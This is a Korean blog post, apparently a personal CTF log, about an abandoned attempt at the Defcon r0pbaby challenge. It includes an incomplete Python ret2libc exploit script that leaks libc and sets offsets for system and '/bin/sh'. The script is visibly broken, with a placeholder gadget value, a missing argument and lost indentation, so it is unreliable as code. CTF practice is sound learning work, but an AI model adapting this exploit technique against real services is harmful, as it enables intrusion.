ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • Defcon r0pbaby푸는데
    CTF 2016. 5. 19. 03:02

    system넣고 실행하려면 인자 rdi 받아서 호출시켜야하는데 pop rdi;ret 이없다 야호..


    그래서 설마하고 ropshell.com에 넣어서 해봤더니 없음 야호..


    짜다 버린 소스 공유@@


     무쓸모~~





    from socket import *

    import struct

    from telnetlib import *



    p = lambda x:struct.pack("<Q",x)

    up = lambda x:struct.unpack("<Q",x)


    def recvuntil(t):

            data = ''

            while not data.endswith(t):

                    tmp = s.recv(1)

                    if not tmp: break

                    data += tmp

            return data


    def libcaddress(a):

    s.send("1\n")

    print recvuntil("libc.so.6: ")

    libc_base = int(s.recv(18).split()[0],16)

    print hex(libc_base)

    return a

    def systemaddr():

    s.send("2\n")

    print recvuntil("Enter symbol: ")

    s.send("system\n")

    system_addr = int(s.recv(18).split()[2],16)

    print system_addr



    HOST = "10.211.55.8"

    PORT = 11111


    s = socket(AF_INET,SOCK_STREAM)

    s.connect((HOST,PORT))


    libc_system = 0x46640

    libc_binsh = 0x17ccdb

    poprdiret = whatthefuck;;



    print recvuntil("4) Exit\n:")


    libcaddress()


    #systemaddr()


    t = Telnet()

    t.sock = s

    t.interact()

    s.close()




    'CTF' 카테고리의 다른 글

    Defcon 24 - LEGIT 1,2,3 Patched  (0) 2016.05.23
    Defcon 24 - easy_prasky  (4) 2016.05.23
    Defcon 23 - babycmd  (7) 2016.05.19
    TUCTF pwn75  (0) 2016.05.18
    TUCTF woO2  (0) 2016.05.18

    댓글

Designed by Tistory.